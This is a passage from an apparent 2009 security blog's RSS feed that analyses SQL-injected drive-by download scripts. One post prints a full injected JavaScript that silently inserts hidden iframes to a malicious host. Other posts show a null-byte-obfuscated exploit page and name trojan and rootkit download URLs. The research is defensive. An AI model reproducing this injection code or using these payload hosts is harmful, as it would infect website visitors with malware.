<p>Ultimately the exploits installs a trojan [<a title="VT analysis" href="http://www.virustotal.com/analisis/bdf8b6ce2d2579b7d52dd91add66eabed34ca72aa1de7517d00ffd118c2e2bac-1243519083" target="_blank">VT analysis</a>]</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/164/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=164&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/05/28/218-213-77-96a-js/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>3b3.org/c.js</title>
		<link>http://s3cwatch.wordpress.com/2009/04/16/3b3orgcjs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/04/16/3b3orgcjs/#comments</comments>
		<pubDate>Thu, 16 Apr 2009 13:46:45 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=159</guid>
		<description><![CDATA[This sql-injected script src has been around for some time. The interesting point of this script is that it behaves differently if the injected site is from &#8220;.gov.cn&#8221; or &#8220;.edu.cn&#8221;. Code as shown below: var s,siteUrl,tmpdomain; var arydomain = new Array(".gov.cn",".edu.cn"); s = document.location+""; siteUrl=s.substring(7,s.indexOf('/',7)); tmpdomain = 0; for(var i=0;i&#60;arydomain.length; i++) { if(siteUrl.indexOf(arydomain[i]) &#62; -1){ [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=159&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This sql-injected script src has been around for some time.</p>
<p>The interesting point of this script is that it behaves differently if the injected site is from &#8220;.gov.cn&#8221; or &#8220;.edu.cn&#8221;. Code as shown below:<span id="more-159"></span></p>
<p><code>var s,siteUrl,tmpdomain;<br />
var arydomain = new Array(".gov.cn",".edu.cn");<br />
s = document.location+"";<br />
siteUrl=s.substring(7,s.indexOf('/',7));<br />
tmpdomain = 0;<br />
for(var i=0;i&lt;arydomain.length; i++)<br />
{<br />
if(siteUrl.indexOf(arydomain[i]) &gt; -1){<br />
tmpdomain = 1;<br />
break;<br />
}<br />
}<br />
if(tmpdomain == 0){<br />
document.writeln("&lt;iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0&gt;&lt;/<br />
iframe&gt;");<br />
function rl()<br />
{<br />
var msgObj = document.createElement("div");<br />
msgObj.setAttribute("id","msgDiv");<br />
document.body.appendChild(msgObj);<br />
var obj = document.getElementById("msgDiv");<br />
obj.innerHTML ="&lt;iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0&gt;&lt;/<br />
iframe&gt;";<br />
}<br />
setInterval("rl()",10000);<br />
}</code></p>
<p>The injected iframe a100.htm inserts another iframe au.htm.</p>
<p>au.htm deploys another obfuscation technique, which is to embed null bytes into the file. The top portion of the file is as shown:</p>
<p><font size="-3"><code>00000000  3c 00 00 68 00 74 00 6d  6c 3e 00 00 0d 0a 00 00  |&lt;..h.t.ml&gt;......|<br />
00000010  3c 00 00 73 00 00 63 72  00 69 00 00 70 00 00 74  |&lt;..s..cr.i..p..t|<br />
00000020  00 3e 00 00 0d 00 00 0a  69 00 00 66 00 28 00 6e  |.&gt;......i..f.(.n|<br />
00000030  00 00 61 76 00 69 00 67  61 00 74 00 6f 72 2e 00  |..av.i.ga.t.or..|<br />
00000040  00 75 00 00 73 00 65 00  00 72 00 00 41 67 00 00  |.u..s.e..r..Ag..|<br />
00000050  65 00 00 6e 74 00 2e 74  00 00 6f 00 00 4c 6f 00  |e..nt..t..o..Lo.|<br />
00000060  77 65 72 00 00 43 61 73  65 00 28 29 00 00 2e 00  |wer..Case.()....|</code></font></p>
<p>If all the bytes 00 are removed, you get back a beautiful html file.</p>
<p>au.htm contains links to exploits of typical vulnerabilities. One malicious file that will be downloaded is http://xia8866.com/xia/f5.css [<a href="http://www.threatexpert.com/report.aspx?md5=214c6a1b962656d2357ed5027508b589">Threatexpert result</a>]</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/159/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/159/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=159&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/04/16/3b3orgcjs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>cn0093.cn/v.js</title>
		<link>http://s3cwatch.wordpress.com/2009/03/09/cn0093cnvjs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/03/09/cn0093cnvjs/#comments</comments>
		<pubDate>Mon, 09 Mar 2009 14:50:40 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=157</guid>
		<description><![CDATA[following previous post, a new injected script has emerged that resolves to same IP. v.js retrieves another iframe src www.vieio.cn/i.htm. This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=157&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>following previous post, a new injected script has emerged that resolves to same IP.</p>
<p>v.js retrieves another iframe src www.vieio.cn/i.htm.</p>
<p>This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/157/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/157/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/157/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=157&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/03/09/cn0093cnvjs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>tsnse.cn/i.js</title>
		<link>http://s3cwatch.wordpress.com/2009/03/05/tsnsecnijs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/03/05/tsnsecnijs/#comments</comments>
		<pubDate>Thu, 05 Mar 2009 15:37:46 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=155</guid>
		<description><![CDATA[This sql-injected script calls iframe www.gomne.cn/yh.htm yh.htm has the same vulnerability exploits as the previous post. Most likely from the same kit. The exploits download malicious executable from www.at820.cn/wins.exe [VT results] CWSandbox analysis of wins.exe shows further download such as rootkit www.at820.cn/ie.exe [VT results] Note that all 3 domains tsnse.cn, www.gomne.cn and www.at820.cn resolve to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=155&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This sql-injected script calls iframe www.gomne.cn/yh.htm</p>
<p><span id="more-155"></span>yh.htm has the same vulnerability exploits as the previous post. Most likely from the same kit.</p>
<p>The exploits download malicious executable from www.at820.cn/wins.exe [<a title="VirusTotal analysis" href="http://www.virustotal.com/analisis/0a58b5ea47b7ae9ad3b8b2c5bf4df5e5" target="_blank">VT results</a>]</p>
<p><a title="Sunbelt analysis" href="http://research.sunbeltsoftware.com/ViewMalware.aspx?id=7814080" target="_blank">CWSandbox analysis</a> of wins.exe shows further download such as rootkit www.at820.cn/ie.exe [<a title="VirusTotal analysis" href="http://www.virustotal.com/analisis/c2878e2974c0f346acdbf2ffe8bc36b9" target="_blank">VT results</a>]</p>
<p>Note that all 3 domains tsnse.cn, www.gomne.cn and www.at820.cn resolve to the same IP address 120.50.35.138.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/155/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&amp;blog=3886751&amp;post=155&amp;subd=s3cwatch&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/03/05/tsnsecnijs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
	</channel>
</rss>
